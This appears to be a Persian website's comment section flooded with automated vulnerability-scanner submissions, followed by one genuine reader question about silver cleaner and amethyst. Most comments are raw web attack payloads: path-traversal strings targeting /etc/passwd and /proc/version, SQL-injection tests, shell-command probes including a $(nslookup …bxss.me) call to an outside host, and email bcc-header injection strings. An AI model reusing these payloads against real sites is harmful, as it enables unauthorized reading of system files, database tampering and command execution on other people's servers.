qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
/.././.././.././.././.././.././.././../etc/./passwd%00

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
%2fetc%2fpasswd

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
/etc/passwd

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
.\./.\./.\./.\./.\./.\./etc/passwd

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
/../..//../..//../..//../..//../..//etc/passwd.jpg

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
0

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
0

0 0

sivathvw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
to
bcc:013405.38-2980.38.c0025.1

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../../../../../../../../../../etc/passwd.jpg

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
0

0 0

sivathvw 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
1
bcc:013405.38-2979.38.c0025.1

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
0

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../../../../../../../../../../../../../../../proc/version

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
0

0 0

qkoabkfh 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
../../../../../../../../../../etc/passwd

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
0

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
0

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:47
0

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
0

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
-1" OR 2+616-616-1=0+0+0+1 --

0 0

pcjlphpo 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
gbnAMTjQ

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
-1 OR 2+98-98-1=0+0+0+1

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
-1 OR 2+649-649-1=0+0+0+1 --

0 0

pylrwalx 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
6iNLoTFW

0 0

tlfmtkjg 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
$(nslookup dns.ce.13405.38-2961.38.c0025.1.bxss.me)

0 0

tlfmtkjg 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
set|set&set

0 0

vdnomrbd 51 سال میگه :

تاریخ: 1398/12/08 ساعت 19:46
1

0 0

هاله قنبرپور 51 سال میگه :

تاریخ: 1398/01/08 ساعت 01:41
با سلام
لطفا بگویید آیا مایع سفید کننده ی مخصوص نقره بر سنگ آمیتیس اثر منفی دارد ؟؟

اخبار سایر رسانه ها